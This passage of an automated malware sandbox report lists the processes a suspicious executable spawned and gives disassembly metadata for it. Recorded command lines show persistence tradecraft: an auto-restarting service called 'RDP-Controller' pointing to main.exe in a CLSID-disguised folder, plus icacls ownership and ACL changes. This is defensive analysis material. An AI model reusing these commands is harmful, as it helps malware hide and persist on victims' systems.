                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:21
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe stop RDP-Controller
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:22
                                  Start time:19:11:24
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:23
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:24
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:25
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe failure RDP-Controller reset= 1 actions= restart/10000
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:26
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:27
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\sc.exe
                                  Wow64 process (32bit):false
                                  Commandline:sc.exe start RDP-Controller
                                  Imagebase:0x7ff7d1e80000
                                  File size:72'192 bytes
                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:28
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:29
                                  Start time:20:30:26
                                  Start date:24/09/2024
                                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Imagebase:0x7ff7aabd0000
                                  File size:89'088 bytes
                                  MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Antivirus matches:
                                  • Detection: 11%, ReversingLabs
                                  Has exited:true

                                  Target ID:30
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\icacls.exe
                                  Wow64 process (32bit):false
                                  Commandline:icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
                                  Imagebase:0x7ff749be0000
                                  File size:39'424 bytes
                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:31
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:32
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\icacls.exe
                                  Wow64 process (32bit):false
                                  Commandline:icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
                                  Imagebase:0x7ff749be0000
                                  File size:39'424 bytes
                                  MD5 hash:48C87E3B3003A2413D6399EA77707F5D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:33
                                  Start time:20:30:27
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:34
                                  Start time:20:30:49
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:35
                                  Start time:20:31:06
                                  Start date:24/09/2024
                                  Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                  Imagebase:0x7ff7063a0000
                                  File size:468'120 bytes
                                  MD5 hash:B3676839B2EE96983F9ED735CD044159
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:36
                                  Start time:20:31:06
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:37
                                  Start time:20:31:16
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:38
                                  Start time:20:31:17
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -pss -s 440 -p 7988 -ip 7988
                                  Imagebase:0x7ff6ea010000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:39
                                  Start time:20:31:17
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\WerFault.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\WerFault.exe -u -p 7988 -s 1128
                                  Imagebase:0x7ff6ea010000
                                  File size:570'736 bytes
                                  MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:true

                                  Target ID:40
                                  Start time:20:31:17
                                  Start date:24/09/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                  Imagebase:0x7ff7b4ee0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Target ID:41
                                  Start time:20:31:49
                                  Start date:24/09/2024
                                  Path:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
                                  Imagebase:0x7ff7aabd0000
                                  File size:89'088 bytes
                                  MD5 hash:4E320E2F46342D6D4657D2ADBF1F22D0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Reset < >
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CA05F
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CA065
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CA06B
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 3668304517-0
                                    • Opcode ID: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                    • Instruction ID: f01132f22e98093e879990006570dc18aca1f78398c9d62774f24d1f293e41e0
                                    • Opcode Fuzzy Hash: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
                                    • Instruction Fuzzy Hash: B2B15D35928B8C8FDB54EF28C884A9AB7E1FFA8310F50571EE84AD7255DB70D481CB81
                                    APIs
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CD0F7
                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 032CD0FD
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: _invalid_parameter_noinfo_noreturn
                                    • String ID:
                                    • API String ID: 3668304517-0
                                    • Opcode ID: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                    • Instruction ID: b8aa88481214b34ca363a55c2bef5469f45356665e809bc6cb2f85253a10fde6
                                    • Opcode Fuzzy Hash: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
                                    • Instruction Fuzzy Hash: DCA16C35938B8C8BDB54EF2CD8856EAB7E1FB98350F10572EE88AC7154DB709581CB81
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
                                    • Instruction ID: 96718e7c29df43bcc39e7e2c03e2ac50a41638d8948979aa52e27d70cec14227
                                    • Opcode Fuzzy Hash: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
                                    • Instruction Fuzzy Hash: D3A1B231A38E4C8FCB59FF28C4A56AEB3E1FBA9310B04471ED44AD7254DA70E985C785
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: _clrfp
                                    • String ID:
                                    • API String ID: 3618594692-0
                                    • Opcode ID: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                    • Instruction ID: c41a7211af1dec433722488d94921d1e60cb790fcb573152d3204f383b308f66
                                    • Opcode Fuzzy Hash: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
                                    • Instruction Fuzzy Hash: A6B15A30520A4E8FDB99DF1CC88AB56B7E0FF59314F198599E859CB262C335E892CF01
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
                                    • Instruction ID: f6977598c21f0ff6f4029b6bf79b8727db456bedc04cd9ab99a2a286cb15b97c
                                    • Opcode Fuzzy Hash: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
                                    • Instruction Fuzzy Hash: 19E17F31938B8D8BC745DF28C8945BAB3E1FFA8300F54971EE886D7155EBB4A684C781
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
                                    • Instruction ID: fdad764fa0ec38c52402cde4b9991c6ac1c58b5b29bdaec700d175c865204620
                                    • Opcode Fuzzy Hash: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
                                    • Instruction Fuzzy Hash: 8E610930A2CF5C4FDB28EF6C984907AB7E5FB95710F14475FE886C3155DA74A88286C2
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
                                    • Instruction ID: 0af98be0be9fa867be93cd9073e1f8954fa5c19063351f70e21071c634817c00
                                    • Opcode Fuzzy Hash: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
                                    • Instruction Fuzzy Hash: AB510332328E0D8F8B0CDE6CE49857573D2F7AD321315836EE44ED7265DA74E8868781
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                    • Instruction ID: 3386471e0a6e101c2b1e0e56983a79d5ad3215e41cbaa571db5c0cec83884569
                                    • Opcode Fuzzy Hash: b3bfdd2e48ad19d66b0e37b2c6738ec7b33e2acd157bee24fc1458e38cb5dc2f
                                    • Instruction Fuzzy Hash: 9B21C5317226054BE70CCE2EC89A575B3D6F7D9209B58C27DE14BCB397CD3268038A08
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                    • Instruction ID: 110cce43097e80305b570b12dba631c32597889de4c5a0e6f97e678bc351772b
                                    • Opcode Fuzzy Hash: 818b3c2bf741691b3b4d97ce965452ef50dff5a67fbb0249e4fef83404bb3482
                                    • Instruction Fuzzy Hash: 7711A1723208058FD74CCE3EC98A66577D6EB89205B18C3BDE51ACB26ADA35D943C744
                                    APIs
                                    • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 032D0DCF
                                      • Part of subcall function 032D3132: __GetUnwindTryBlock.LIBCMT ref: 032D3175
                                      • Part of subcall function 032D3132: __SetUnwindTryBlock.LIBVCRUNTIME ref: 032D319A
                                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 032D0EA7
                                    • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 032D10F5
                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 032D1202
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                    • String ID: csm$csm$csm
                                    • API String ID: 849930591-393685449
                                    • Opcode ID: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                    • Instruction ID: a1b197e950e9a69f3d5579c9d13016eaa9f49f144cc7cfcfc853517fedb2626f
                                    • Opcode Fuzzy Hash: 3fb9d0c56a71d0f5861e67f07a09d0a106b159fdbf12d619d0216d77a39e9afb
                                    • Instruction Fuzzy Hash: 0EE1F430938B498FDB54EF6CC4856A9B7E1FB99310F14425ED889CB661DB70E4D1CB82
                                    APIs
                                    • Is_bad_exception_allowed.LIBVCRUNTIME ref: 032D13E0
                                    • std::bad_alloc::bad_alloc.LIBCMT ref: 032D1709
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                    • String ID: csm$csm$csm
                                    • API String ID: 3523768491-393685449
                                    • Opcode ID: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                    • Instruction ID: 0dbd1091a68803dcff920d8702161e1d3b4d9b6d75261add4384cdf442a2c70d
                                    • Opcode Fuzzy Hash: 3c37fd6db8f1d7251cf834ba82edf3def457dd0e8a8ae703ba663f2cb829a33b
                                    • Instruction Fuzzy Hash: 91E11734438B498FCB54EF28C4846AAB7E1FF59310F14466DD486CBA62DB70E4D2CB82
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                    • Instruction ID: d1b72f817b3d836422b1e0e8486db38909ede09f94955550fca6a4c133dff7b9
                                    • Opcode Fuzzy Hash: 9b1c0b3f231e4bcddaa8a570e8cd9ce20c2063c8fc35274121e91c7c1a746b78
                                    • Instruction Fuzzy Hash: C6C1E430138F4B8FDB29EB689054675B2E1FB99710F68C66DD486C7165EAB0D8C1C7C1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $($2$H$P!`$`
                                    • API String ID: 0-2682688576
                                    • Opcode ID: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                    • Instruction ID: 7b95148ab3caafcfcdfd234bc62fd11318c4d3f06adbd384d8e5ca4abebe78b2
                                    • Opcode Fuzzy Hash: bc76d62830869bcd39272dfef10d6a3318e6b9030b160a7bcb89a7604e377882
                                    • Instruction Fuzzy Hash: 8FC105B0918B888FD7A4DF18C08879ABBE0FB99704F504A6ED8CDCB215DB705589CF46
                                    APIs
                                    • _CallSETranslator.LIBVCRUNTIME ref: 032D1A71
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CallTranslator
                                    • String ID: MOC$RCC
                                    • API String ID: 3163161869-2084237596
                                    • Opcode ID: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                    • Instruction ID: d65d2ca03d5ec7d9d5f810452d2cbed7aa459c3a8658b78b76f888eabab09618
                                    • Opcode Fuzzy Hash: 7f7ab6c02d15fb7cada80a290f40bf769916c592d438a3060e1af43374edef25
                                    • Instruction Fuzzy Hash: 9FA1B430928B488FCB59EF6CD885AA9BBF0FB98314F14465EE449C7111EB74E581CB82
                                    APIs
                                    • __except_validate_context_record.LIBVCRUNTIME ref: 032D00A5
                                    • _IsNonwritableInCurrentImage.LIBCMT ref: 032D013C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 3242871069-1018135373
                                    • Opcode ID: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                    • Instruction ID: 76515b14964c2cc3b5909f3e380c4bbd1d8480b77db88ee54e7f269c2b706a92
                                    • Opcode Fuzzy Hash: 859e345823d80db8230311a4c986b9b96598fc69a601b47f6fead17499a59a6c
                                    • Instruction Fuzzy Hash: BD61E73072DA098BCF28EE5CD489A7973D5FB54350F14816DE886C7266EA70ECD18B85
                                    APIs
                                    • _CallSETranslator.LIBVCRUNTIME ref: 032D17F1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CallTranslator
                                    • String ID: MOC$RCC
                                    • API String ID: 3163161869-2084237596
                                    • Opcode ID: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                    • Instruction ID: 11b07d04d3d9d4302f13809797fc0d929ae68548e3c897718611b6658021d6ae
                                    • Opcode Fuzzy Hash: f204141aae82d9f6845b5da32682795ff5f0ac0b8fb77a8709c63a3dfbf03d15
                                    • Instruction Fuzzy Hash: 39718E30528B488FD768EF18C446BAAB7E0FF99314F144A5EE48AC7251DB74A5D1CB82
                                    APIs
                                    • __except_validate_context_record.LIBVCRUNTIME ref: 032D28B0
                                    • _CreateFrameInfo.LIBVCRUNTIME ref: 032D28D9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.1277798482.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_32c0000_file.jbxd
                                    Similarity
                                    • API ID: CreateFrameInfo__except_validate_context_record
                                    • String ID: csm
                                    • API String ID: 2558813199-1018135373
                                    • Opcode ID: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                    • Instruction ID: 5b365d535ffdf2f255a11d14432baf8e7f242df58cb3b8236db549556c06c5bb
                                    • Opcode Fuzzy Hash: 06c119407accd39f8435343144e30bf6358969287a5cf68c59ee8460d9e456f2
                                    • Instruction Fuzzy Hash: FD51AAB4528B449FC760EF2CC18966A77E1FB89351F10095ED48EC7261DB70E882CB83

                                    Execution Graph

                                    Execution Coverage:59.2%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:11
                                    Total number of Limit Nodes:1
                                    execution_graph 89 2c30650 90 2c30665 89->90 95 2c30620 VirtualAlloc 90->95 92 2c306d0 96 2c301b0 VirtualAlloc 92->96 95->92 97 2c3023b VirtualProtect 96->97 99 2c30321 VirtualFree 97->99 102 2c3030c 97->102 100 2c30347 VirtualFree VirtualAlloc 99->100 100->102 101 2c30531 102->101 103 2c304f9 VirtualProtect 102->103 103->102

                                    Callgraph

                                    Control-flow Graph

                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2527707074.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_2c30000_file.jbxd
                                    Similarity
                                    • API ID: Virtual$AllocFreeProtect
                                    • String ID:
                                    • API String ID: 267585107-0
                                    • Opcode ID: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                    • Instruction ID: 70586b82389ab0cfea8752151eb0703158240165f98089e7110fa4395dbc2eb9
                                    • Opcode Fuzzy Hash: d4c2a8ca2ad52b1407480866e6e93688b0dc4b0e284f3aa7e09f2a5729c8ff95
                                    • Instruction Fuzzy Hash: EDC1DA3021CA488FD785EF5CC498B6AB7E1FB98315F50585DF48AC7261DBB4E981CB06

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 34 2c30620-2c30644 VirtualAlloc
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.2527707074.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_2c30000_file.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID:
                                    • API String ID: 4275171209-0
                                    • Opcode ID: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                    • Instruction ID: 42c62d54d1ca80df244572d2250d49a4e48d2af1a4e11cc88891e319d730dc5d
                                    • Opcode Fuzzy Hash: d93f75fe62b5d066bb1a3d92e36f140eac5fcecea37a8835d89b2688be319dec
                                    • Instruction Fuzzy Hash: C7C08C3060A2004BDB0C6B38D8A9B1B3AE0FB8C300FA0552DF18BC2290C97EC4828786

                                    Execution Graph

                                    Execution Coverage:6.3%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:8.2%
                                    Total number of Nodes:1683
                                    Total number of Limit Nodes:8
